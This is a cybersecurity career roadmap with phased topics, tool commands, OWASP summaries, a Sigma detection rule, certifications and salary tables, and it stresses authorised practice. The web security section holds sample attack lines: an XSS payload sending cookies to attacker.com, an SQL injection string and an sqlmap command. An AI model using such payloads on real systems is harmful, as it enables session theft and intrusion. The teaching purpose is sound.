Cybersecurity is one of the fastest-growing fields in tech — with millions of unfilled roles and salaries rivalling software engineering. But "cybersecurity" covers a huge spectrum: penetration testing, cloud security, incident response, cryptography, governance, and more. This roadmap shows you exactly what to learn, in what order, and which certifications actually matter, so you can move from zero to job-ready in 12–18 months.
At a glance
| Phase |
Topics |
Time estimate |
| 1 |
Foundations: networking and operating systems |
6–8 weeks |
| 2 |
Linux and command-line proficiency |
4–6 weeks |
| 3 |
Programming and scripting basics |
4–6 weeks |
| 4 |
Core security concepts and cryptography |
4–6 weeks |
| 5 |
Web security and OWASP Top 10 |
3–4 weeks |
| 6 |
Ethical hacking and penetration testing |
6–8 weeks |
| 7 |
Defensive security: SIEM, SOC, and blue team |
4–6 weeks |
| 8 |
Cloud security (AWS/Azure/GCP) |
4–6 weeks |
| 9 |
Malware analysis and digital forensics |
4–6 weeks |
| 10 |
Compliance, governance, and risk |
2–3 weeks |
| 11 |
Certifications and portfolio |
4–8 weeks |
| Total to first role |
|
~12–18 months |
Phase 1 — Networking and operating system foundations
Security professionals spend most of their time on networks. You cannot protect what you do not understand.
Core networking skills
| Topic |
What to know |
| OSI model |
7 layers — what happens at each, common attack surfaces per layer |
| TCP/IP |
3-way handshake, TCP vs UDP, IP addressing, CIDR notation |
| DNS |
Record types (A/AAAA/MX/TXT/CNAME/NS/PTR), DNS poisoning |
| HTTP/HTTPS |
Methods, status codes, headers, TLS 1.3 handshake |
| Common protocols |
FTP, SSH, SMTP, IMAP, POP3, SNMP, LDAP, Kerberos port numbers |
| Firewalls |
Stateless vs stateful, packet filtering, WAF |
| NAT and VPN |
NAT types, IPsec vs OpenVPN vs WireGuard |
Practical tools
# Network reconnaissance
nmap -sV -sC -O 192.168.1.0/24 # version + script scan
nmap -p- --min-rate 5000 <IP> # all ports fast
# Traffic analysis
tcpdump -i eth0 port 80 -w capture.pcap
wireshark # GUI packet inspector
# DNS enumeration
dig +any example.com
nslookup -type=TXT example.com
# Connectivity testing
ping -c 4 8.8.8.8
traceroute 8.8.8.8
curl -I https://example.com
Phase 2 — Linux proficiency
Most servers run Linux. Most security tools run on Linux. You must be comfortable on the command line.
Essential Linux for security
# File permissions (critical for privilege escalation)
ls -la /etc/shadow # check who can read sensitive files
find / -perm -4000 2>/dev/null # find SUID binaries (escalation targets)
find / -writable -type f 2>/dev/null | grep -v proc
# Process and network inspection
ps aux | grep <process>
ss -tlnp # listening ports + PIDs
netstat -antp
lsof -i :80 # what's on port 80
# Log analysis
tail -f /var/log/auth.log # authentication events
journalctl -u ssh --since "1 hour ago"
grep "Failed password" /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -rn
# User and privilege management
id # current user + groups
sudo -l # what can I run as sudo?
cat /etc/passwd | grep -v nologin
getent group sudo
Linux hardening checklist
| Area |
Hardening action |
| SSH |
Disable root login, use key auth, change default port |
| Firewall |
ufw enable, allow only needed ports |
| Updates |
unattended-upgrades enabled |
| Users |
Remove unused accounts, enforce strong passwords |
| SUID |
Audit and remove unnecessary SUID binaries |
| Logging |
Enable auditd, forward logs to SIEM |
| Cron |
Review /etc/cron* for unexpected entries |
Phase 3 — Programming and scripting
You don't need to be a software developer, but scripting is essential for automation, tool development, and understanding exploits.
Python for security
# Port scanner
import socket
def scan_port(host, port):
try:
with socket.create_connection((host, port), timeout=1):
return True
except (socket.timeout, ConnectionRefusedError):
return False
open_ports = [p for p in range(1, 1025) if scan_port("192.168.1.1", p)]
print(f"Open ports: {open_ports}")
# Hash a password (never store plain text)
import hashlib
import secrets
salt = secrets.token_hex(16)
hashed = hashlib.pbkdf2_hmac("sha256", b"password", salt.encode(), 100_000)
print(f"Salt: {salt}, Hash: {hashed.hex()}")
# Parse HTTP logs for suspicious IPs
from collections import Counter
with open("/var/log/nginx/access.log") as f:
ips = [line.split()[0] for line in f]
top_ips = Counter(ips).most_common(10)
print(top_ips)
Bash scripting for automation
#!/usr/bin/env bash
# Quick recon script
TARGET=$1
echo "[*] Running recon on $TARGET"
echo "[*] Pinging..."
ping -c 1 "$TARGET" &>/dev/null && echo "Host is up" || echo "Host is down"
echo "[*] Top 100 ports..."
nmap -F "$TARGET" -oN "recon-$TARGET.txt"
echo "[*] Done. Results saved."
Languages worth knowing
| Language |
Use case in security |
| Python |
Scripting, exploit development, automation, forensics |
| Bash |
Linux automation, log parsing, quick recon scripts |
| PowerShell |
Windows administration and incident response |
| JavaScript |
Understanding XSS, prototype pollution, Node.js vulns |
| SQL |
Exploiting and defending against SQL injection |
| Go |
Building fast, portable security tools (many modern tools use Go) |
Phase 4 — Core security concepts and cryptography
The CIA triad + beyond
| Concept |
Definition |
Attack example |
| Confidentiality |
Data only accessible to authorised parties |
Eavesdropping, data breach |
| Integrity |
Data not altered without detection |
Man-in-the-middle, file tampering |
| Availability |
Systems accessible when needed |
DDoS, ransomware |
| Authentication |
Verifying identity |
Credential stuffing, phishing |
| Authorisation |
Verifying what you can do |
IDOR, privilege escalation |
| Non-repudiation |
Proof that an action occurred |
Log tampering |
Cryptography essentials
| Concept |
Detail |
| Symmetric encryption |
Same key for encrypt + decrypt (AES-256, ChaCha20) — fast |
| Asymmetric encryption |
Public + private key pair (RSA-2048, ECDSA) — slower, used for key exchange |
| Hashing |
One-way (SHA-256, bcrypt, Argon2) — passwords, integrity checks |
| Digital signatures |
Hash + asymmetric sign → authenticity + integrity |
| PKI / certificates |
X.509 cert chain from root CA → intermediate → leaf |
| TLS 1.3 |
ECDHE key exchange, AEAD cipher (AES-GCM), 0-RTT option |
Common attacks on cryptography
| Attack |
Target |
Defence |
| Brute force |
Weak passwords / short keys |
Strong passwords, Argon2/bcrypt, 256-bit keys |
| Rainbow tables |
Unsalted hashes |
Always salt passwords |
| MITM |
TLS downgrade / cert spoofing |
HSTS, certificate pinning, HPKP |
| Padding oracle |
CBC-mode encryption |
Use AEAD modes (AES-GCM) |
| Birthday attack |
Short hashes |
SHA-256 minimum, avoid MD5/SHA-1 |
| Side-channel |
Timing leaks |
Constant-time comparison |
Phase 5 — Web security and OWASP Top 10
Web applications are the most common attack surface. Learn every item on the OWASP Top 10 inside out.
OWASP Top 10 (2021)
| Rank |
Vulnerability |
Quick description |
| A01 |
Broken Access Control |
IDOR, privilege escalation, CORS misconfiguration |
| A02 |
Cryptographic Failures |
Weak ciphers, unencrypted PII, MD5 passwords |
| A03 |
Injection |
SQL injection, command injection, LDAP injection |
| A04 |
Insecure Design |
Missing threat modelling, no security controls in design |
| A05 |
Security Misconfiguration |
Default credentials, exposed error pages, open S3 buckets |
| A06 |
Vulnerable Components |
Outdated libraries with known CVEs |
| A07 |
Auth and Session Failures |
Weak passwords, missing MFA, insecure session tokens |
| A08 |
Software and Data Integrity |
Unsigned updates, CI/CD pipeline attacks, deserialization |
| A09 |
Logging and Monitoring Failures |
No alerting on brute force, undetected breaches |
| A10 |
SSRF |
Forging requests to internal resources (cloud metadata API) |
SQL injection — detect and prevent
-- Vulnerable (NEVER do this)
query = "SELECT * FROM users WHERE username='" + username + "'"
-- Injected input: ' OR '1'='1
-- Becomes: SELECT * FROM users WHERE username='' OR '1'='1'
-- Returns all users!
# Safe: parameterised queries
cursor.execute("SELECT * FROM users WHERE username = %s", (username,))
# Test for SQLi with sqlmap:
# sqlmap -u "https://target.com/login" --data "user=test&pass=test" --dbs
XSS — detect and prevent
// Reflected XSS: input echoed in response without sanitisation
// Payload: <script>document.location='https://attacker.com/?c='+document.cookie</script>
// Prevention
const safe = DOMPurify.sanitize(userInput); // client-side
// Server: encode output with html-entities, set Content-Security-Policy header
Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random}'
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
Phase 6 — Ethical hacking and penetration testing
This is the skill most people think of when they hear "cybersecurity." Penetration testing has a formal methodology.
Pentest methodology
| Phase |
Activities |
| 1. Reconnaissance |
Passive (OSINT, Shodan, LinkedIn) + Active (nmap, DNS enum) |
| 2. Scanning and enumeration |
Port scan, service fingerprint, vuln scan (Nessus/OpenVAS) |
| 3. Exploitation |
CVE exploits, Metasploit, manual exploitation |
| 4. Post-exploitation |
Privilege escalation, lateral movement, persistence |
| 5. Reporting |
Executive summary + technical findings + remediation |
Essential tools
| Tool |
Purpose |
| Nmap |
Network discovery and port scanning |
| Burp Suite |
Web app intercepting proxy and scanner |
| Metasploit |
Exploit framework and payload generation |
| Nikto |
Web server misconfiguration scanner |
| Gobuster / ffuf |
Directory and file brute-forcing |
| Hydra |
Credential brute-forcing (SSH, FTP, web forms) |
| sqlmap |
Automated SQL injection detection and exploitation |
| John / Hashcat |
Password hash cracking |
| Wireshark / tcpdump |
Packet capture and analysis |
| Enum4linux |
Windows/Samba enumeration |
| LinPEAS / WinPEAS |
Automated privilege escalation enumeration |
Practice platforms (free)
| Platform |
Focus |
| TryHackMe |
Guided beginner-to-intermediate labs |
| Hack The Box |
Real-world-style machines, competitive |
| PicoCTF |
CTF competitions, great for beginners |
| OWASP WebGoat |
Intentionally vulnerable web app |
| DVWA (Damn Vulnerable Web App) |
Self-hosted web app vulns |
| VulnHub |
Downloadable vulnerable VMs |
Phase 7 — Defensive security: SIEM, SOC, and blue team
Offensive is exciting, but defensive roles (SOC analyst, incident responder) are where most entry-level jobs are.
Security Operations Centre (SOC)
| SOC tier |
Role |
| Tier 1 |
Alert triage, false positive filtering, initial investigation |
| Tier 2 |
Deep-dive incident analysis, threat hunting |
| Tier 3 |
Advanced threat hunting, tool development, red team correlation |
SIEM fundamentals
A SIEM (Security Information and Event Management) collects logs from every source and correlates them into alerts.
# Example Sigma detection rule (vendor-agnostic SIEM rule format)
title: Suspicious PowerShell Encoded Command
status: test
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- '-EncodedCommand'
- '-enc '
- '-e '
Image|endswith: '\powershell.exe'
condition: selection
level: medium
tags:
- attack.execution
- attack.t1059.001
Key log sources to monitor
| Source |
What to look for |
| Windows Event Logs |
4624 (logon), 4625 (failed logon), 4688 (process creation), 4698 (scheduled task) |
| Linux auth.log |
Failed SSH, sudo usage, new user creation |
| Firewall logs |
Blocked connections, port scans, unusual outbound |
| DNS logs |
Long domain names (data exfil), newly registered domains, DGA patterns |
| Web server logs |
403/404 spikes (scanning), large POSTs (upload), unusual User-Agents |
| EDR/AV alerts |
Malware detections, suspicious process trees |
Incident response (NIST framework)
| Phase |
Actions |
| Preparation |
Playbooks, tools, team roles, backups |
| Detection and analysis |
Identify IoCs, scope the incident |
| Containment |
Isolate affected systems, block attacker IPs |
| Eradication |
Remove malware, patch vulnerability |
| Recovery |
Restore systems from clean backups, verify integrity |
| Post-incident |
Root cause analysis, lessons learned, report |
Phase 8 — Cloud security
Cloud misconfigurations are the #1 cause of breaches. Every security professional needs cloud literacy.
Shared responsibility model
| Layer |
AWS manages |
Customer manages |
| IaaS (EC2) |
Physical, hypervisor, network |
OS, app, data, IAM |
| PaaS (RDS) |
Physical, OS, DB engine |
Data, IAM, encryption |
| SaaS (Workmail) |
Everything below app layer |
Data, user access |
Top cloud misconfigurations
| Misconfiguration |
Impact |
| Public S3 bucket |
Data exposure |
| Overpermissive IAM role |
Privilege escalation |
| Security group 0.0.0.0/0 on SSH |
Brute force exposure |
| Unencrypted EBS volume |
Data breach if snapshot leaked |
| Metadata service exposed |
SSRF → credential theft (IMDSv1) |
| MFA not enforced on root account |
Account takeover |
| CloudTrail disabled |
No audit trail |
AWS security tools
# Check for exposed resources
aws s3api list-buckets --query 'Buckets[].Name'
aws s3api get-bucket-acl --bucket <name>
# IAM audit
aws iam generate-credential-report
aws iam get-credential-report --query 'Content' | base64 -d
# CloudTrail: check for suspicious API calls
aws cloudtrail lookup-events \
--lookup-attributes AttributeKey=EventName,AttributeValue=ConsoleLogin \
--start-time "2025-01-01T00:00:00Z"
# Security Hub findings
aws securityhub get-findings --filters '{"RecordState":[{"Value":"ACTIVE","Comparison":"EQUALS"}]}'
Phase 9 — Malware analysis and digital forensics
Types of malware
| Type |
Behaviour |
Defence |
| Virus |
Attaches to executable files |
Signature-based AV |
| Worm |
Self-propagates over network |
Network segmentation |
| Trojan |
Disguised as legitimate software |
App whitelisting, EDR |
| Ransomware |
Encrypts files, demands payment |
Offline backups, EDR |
| Rootkit |
Hides itself at OS/kernel level |
Secure boot, EDR |
| Spyware |
Keylogging, screen capture |
EDR, monitoring |
| Botnet / C2 |
Remote control via C2 server |
Network monitoring, DNS filtering |
| Fileless |
Runs in memory only |
Behavioural detection, AMSI |
Static malware analysis
# File identification
file malware.bin
strings malware.bin | grep -E "(http|ftp|cmd|powershell|base64)" | head -30
# Hash for threat intel lookup (VirusTotal)
sha256sum malware.bin
md5sum malware.bin
# PE file analysis (Windows executables)
exiftool malware.exe # metadata
objdump -d malware.exe | head -50 # disassembly
# Use PE Studio or CFF Explorer for GUI analysis
Dynamic analysis (sandbox)
| Tool |
Use |
| Any.run |
Interactive online sandbox |
| Cuckoo Sandbox |
Self-hosted automated analysis |
| REMnux |
Linux distro for malware analysis |
| Flare VM |
Windows VM for reverse engineering |
| Ghidra |
NSA's free reverse engineering framework |
| x64dbg |
Windows debugger for dynamic analysis |
Digital forensics
# Disk imaging (never work on original evidence)
dd if=/dev/sda of=/mnt/external/disk.img bs=4M status=progress
dcfldd if=/dev/sda hash=sha256 hashlog=hash.txt of=disk.img
# Memory acquisition
sudo avml /mnt/external/memory.lime # Linux
# For Windows: WinPmem, Magnet RAM Capture
# Volatility 3 — memory analysis
vol -f memory.lime linux.pslist # running processes
vol -f memory.lime linux.netstat # network connections
vol -f memory.lime linux.bash # bash history in memory
Phase 10 — Compliance, governance, and risk
Many security jobs are in GRC (Governance, Risk, and Compliance) — less technical but high-paying and abundant.
Key frameworks and standards
| Framework |
Scope |
Who uses it |
| NIST CSF 2.0 |
Cybersecurity risk management |
US government, enterprises |
| ISO/IEC 27001 |
Information security management |
Global enterprises, certification |
| SOC 2 Type II |
Service organisation controls (Trust Service Criteria) |
SaaS companies |
| PCI-DSS v4 |
Payment card data security |
Any org processing card payments |
| GDPR |
EU personal data protection |
Any org handling EU resident data |
| HIPAA |
US healthcare data protection |
US healthcare organisations |
| CIS Controls |
Prioritised security actions (18 controls) |
Baseline for any organisation |
| MITRE ATT&CK |
Adversary tactics and techniques |
Threat intelligence, SOC detection |
Risk management basics
Risk = Likelihood × Impact
Risk treatments:
Avoid — stop the risky activity
Mitigate — implement controls to reduce likelihood/impact
Transfer — insurance, third-party contracts
Accept — document and accept residual risk
Full technology map
FOUNDATIONS
├── Networking (TCP/IP, DNS, HTTP, TLS)
├── Operating systems (Linux + Windows)
├── Programming (Python, Bash, PowerShell)
└── Cryptography (AES, RSA, hashing, PKI)
OFFENSIVE (Red Team)
├── Reconnaissance (OSINT, Shodan, nmap)
├── Scanning (Nessus, Nikto, Burp Suite)
├── Exploitation (Metasploit, manual CVEs)
├── Post-exploitation (LinPEAS, privilege escalation)
└── Reporting (findings, remediation, CVSS scores)
DEFENSIVE (Blue Team)
├── SIEM (Splunk, Microsoft Sentinel, Elastic)
├── EDR (CrowdStrike, SentinelOne, Defender)
├── Threat hunting (hypothesis-driven detection)
├── Incident response (NIST 6 phases)
└── Digital forensics (Volatility, Autopsy)
WEB SECURITY
├── OWASP Top 10 (SQLi, XSS, SSRF, etc.)
├── Burp Suite (intercept, scanner, intruder)
├── API security (JWT, OAuth, rate limiting)
└── Source code review (SAST tools)
CLOUD SECURITY
├── AWS (IAM, Security Hub, GuardDuty, CloudTrail)
├── Azure (Defender for Cloud, Entra ID, Sentinel)
├── GCP (Security Command Center, VPC Service Controls)
└── Kubernetes security (RBAC, network policies, OPA)
GRC
├── Frameworks (NIST, ISO 27001, SOC 2, PCI-DSS)
├── Risk management (assessment, treatment)
├── Audit and compliance
└── Policy and procedure writing
Realistic 18-month timeline
| Month |
Focus |
Milestone |
| 1–2 |
Networking + Linux basics |
Pass CompTIA Network+ or Linux Essentials |
| 3–4 |
Python scripting + core security concepts |
Write 3 security automation scripts |
| 5–6 |
Web security + Burp Suite |
Complete TryHackMe Web Fundamentals path |
| 7–8 |
Ethical hacking + Metasploit |
Pass CompTIA Security+ |
| 9–10 |
CTF practice + Hack The Box |
Solve 10 HTB machines |
| 11–12 |
Blue team: SIEM + incident response |
Complete TryHackMe SOC Level 1 path |
| 13–14 |
Cloud security (AWS) |
Pass AWS Security Specialty or CCP |
| 15–16 |
Malware analysis or GRC specialisation |
Pick a track |
| 17–18 |
Portfolio projects + job applications |
3 write-ups + GitHub CVE research |
Certifications (prioritised)
| Certification |
Level |
Cost |
Why it matters |
| CompTIA Security+ |
Entry |
~$400 |
Baseline industry requirement, DoD 8570 compliant |
| CompTIA Network+ |
Entry |
~$370 |
Networking prerequisite (do before Security+) |
| eJPT (eLearnSecurity) |
Entry |
$200 |
Practical pentesting beginner cert |
| CompTIA CySA+ |
Mid |
~$400 |
Blue team / SOC analyst roles |
| OSCP (OffSec) |
Mid-senior |
$1,499 |
Gold standard for penetration testing |
| CEH (EC-Council) |
Mid |
~$1,000 |
HR-friendly but less respected by practitioners |
| CISSP |
Senior |
~$700 |
Management + architecture, needs 5 years experience |
| AWS Security Specialty |
Mid |
$300 |
Cloud security specialist |
| CISM / CISA |
Senior |
~$600 |
GRC, audit, management roles |
| GPEN / GWAPT (GIAC) |
Mid |
~$999 |
Highly respected advanced pentesting |
Cybersecurity roles and salary (2025)
| Role |
Focus |
Avg salary (US) |
| SOC Analyst (L1) |
Alert triage, monitoring |
$55k–$75k |
| SOC Analyst (L2/L3) |
Threat hunting, IR |
$75k–$110k |
| Penetration Tester |
Offensive testing, reporting |
$90k–$140k |
| Application Security Engineer |
Secure SDLC, SAST/DAST |
$110k–$160k |
| Cloud Security Engineer |
AWS/Azure/GCP security |
$120k–$180k |
| Security Engineer |
Architecture, tooling, automation |
$110k–$160k |
| Malware Analyst / Reverse Engineer |
Binary analysis, threat intel |
$90k–$130k |
| GRC Analyst |
Compliance, risk, policy |
$70k–$110k |
| CISO |
Cybersecurity strategy and leadership |
$180k–$350k+ |
Common mistakes to avoid
| Mistake |
Why it hurts |
What to do instead |
| Skipping networking fundamentals |
You won't understand attacks or defences |
Do Network+ before Security+ |
| Only doing CTFs, not learning concepts |
Shallow tool knowledge |
Study the "why" behind each technique |
| Trying to learn everything at once |
Burnout, no depth |
Pick a track (red/blue/cloud) after foundations |
| Ignoring scripting |
Manual work is slow; detection gaps widen |
Python and Bash are non-negotiable |
| Illegal practice on live systems |
Criminal charges |
Stick to authorised labs and CTF platforms |
| Collecting certs without practical skills |
Won't pass technical interviews |
Labs first, certs validate existing skills |
| Ignoring the blue team |
Offensive-only thinking limits you |
Understand both attack and defence |
| Not documenting practice |
Can't show recruiters |
Write up every machine you root |
Cybersecurity vs related fields
| Field |
Focus |
Overlap |
| Cybersecurity |
Protect systems, detect threats, respond to incidents |
— |
| DevSecOps |
Shift security left into CI/CD pipelines |
Cloud, automation |
| Software engineering |
Build secure-by-design applications |
OWASP, secure coding |
| Data engineering |
Secure data pipelines, encryption at rest/transit |
Compliance, GDPR |
| IT operations / SysAdmin |
System management (sometimes same team) |
Linux, networking |
| Threat intelligence |
Research threat actors, malware campaigns |
Malware analysis, OSINT |
Frequently asked questions
Do I need a degree to get into cybersecurity?
No. Many practitioners are self-taught or come from unrelated fields. Certifications (especially Security+ and OSCP), a strong lab portfolio, and CTF write-ups can outweigh a degree for most roles — though some government and defence positions formally require it.
Red team or blue team first?
Start with blue team. Understanding how attacks are detected and how systems are defended gives you context that makes you a better attacker later. SOC analyst roles are also more abundant for entry-level candidates. Many professionals eventually do both (purple team).
What's the fastest path to a job?
CompTIA Security+ + TryHackMe SOC path + 3 HTB write-ups gets many people their first SOC Tier 1 role within 6–9 months. Specialise into pentesting or cloud security after your first 12–18 months of paid experience.
Is ethical hacking (pentesting) legal?
Only with explicit written authorisation from the system owner. Never test systems you don't own or have no written permission to test — this is illegal in almost every jurisdiction regardless of intent. Use TryHackMe, HTB, or your own lab.
OSCP or CEH?
OSCP every time. CEH is a multiple-choice exam with less practitioner respect. OSCP is a 24-hour practical exam where you exploit real machines — it carries significant weight with hiring managers. The CEH is more of an HR check-box at some organisations.
Python or Go for security tooling?
Python first. The security ecosystem (Scapy, Impacket, Volatility, most PoC exploits) is built in Python. Go is growing fast for building portable, high-performance security tools (many modern C2 frameworks are Go-based), but Python gets you further faster as a beginner.